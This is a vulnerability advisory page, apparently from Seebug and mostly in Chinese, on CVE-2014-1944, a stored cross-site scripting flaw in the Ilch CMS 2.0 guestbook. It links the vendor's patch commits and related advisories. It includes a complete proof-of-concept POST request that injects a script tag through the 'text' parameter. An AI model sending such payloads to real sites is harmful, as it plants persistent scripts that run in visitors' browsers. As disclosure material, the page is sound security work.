Lucene search
RootSSV:61716HistoryMar 10, 2014 - 12:00 a.m.
Ilch CMS跨站脚本漏洞
2014-03-1000:00:00
Root
www.seebug.org
19
EPSS
0.003
Percentile
67.8%
CVE ID:CVE-2014-1944
Ilch CMS是一款内容管理系统。
由于传递到“/index.php/guestbook/index/newentry”URL的“text”的HTTP POST参数的用户数据没有充分过滤。远程未经认证的用户可以发送特制的HTTP POST请求,允许永久注入并执行任意HTML和脚本代码。
0
Ilch CMS 2.0
厂商补丁:
Ilch CMS
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://github.com/IlchCMS/Ilch-2.0/commit/381e15f39d07d3cdf6aaaa25c0f2321f817935f7
https://github.com/IlchCMS/Ilch-2.0/commit/02bb4953c0e21cb8f20e5e91db5e15a77fe1a5ce
The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word:
POST /index.php/guestbook/index/newentry HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40email.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert('immuniwweb');</script>&saveEntry=Submit
Related
nvd
nvd
CVE-2014-1944
2014-03-09 13:16:56
prion
prion
Cross site scripting
2014-03-09 13:16:00
exploitdb
exploitdb
Ilch CMS 2.0 - Persistent Cross-Site Scripting
2014-03-05 00:00:00
packetstorm
packetstorm
Ilch CMS 2.0 Cross Site Scripting
2014-03-05 00:00:00
exploitpack
exploitpack
Ilch CMS 2.0 - Persistent Cross-Site Scripting
2014-03-05 00:00:00
securityvulns
securityvulns
Cross-Site Scripting (XSS) in Ilch CMS
2014-05-04 00:00:00
zdt
zdt
Ilch CMS 2.0 - Persistent XSS Vulnerability
2014-03-05 00:00:00
htbridge
htbridge
Cross-Site Scripting (XSS) in Ilch CMS
2014-02-12 00:00:00
cvelist
cvelist
CVE-2014-1944
2014-03-07 20:00:00
cve
cve
CVE-2014-1944
2014-03-09 13:16:56